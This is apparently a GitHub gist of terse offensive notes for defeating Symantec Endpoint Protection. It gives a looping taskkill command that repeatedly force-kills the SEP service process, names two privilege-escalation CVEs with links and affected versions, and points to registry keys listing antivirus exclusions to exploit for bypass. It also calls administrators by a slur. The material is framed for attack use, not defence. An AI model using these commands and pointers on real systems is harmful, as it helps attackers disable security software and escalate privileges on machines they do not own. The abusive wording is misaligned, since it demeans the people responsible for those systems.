Skip to content

Instantly share code, notes, and snippets.

@gquere
Last active February 21, 2022 09:38
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save gquere/5563a5e45e167a92a2eb8a6bbc998c67 to your computer and use it in GitHub Desktop.
Save gquere/5563a5e45e167a92a2eb8a6bbc998c67 to your computer and use it in GitHub Desktop.

Kill it!

As admin launch SymCorpUi.exe and unprotect SEP in options.

for /L %n in (1,0,10) do taskkill /F /IM ccSvcHst.exe & timeout 1

Privesc

CVE-2020-5825 https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825 < 14.2 RU2

CVE-2019-18372 https://www.zerodayinitiative.com/advisories/ZDI-19-990/ < 14.2 RU2 MP1

Exclusions

Retarded admins will sometimes allow a full bypass (extension/filename/directory):

HKLM\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Exclusions
HKLM\SOFTWARE\Symantec\Symantec Endpoint Protection\AV\Exclusions
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment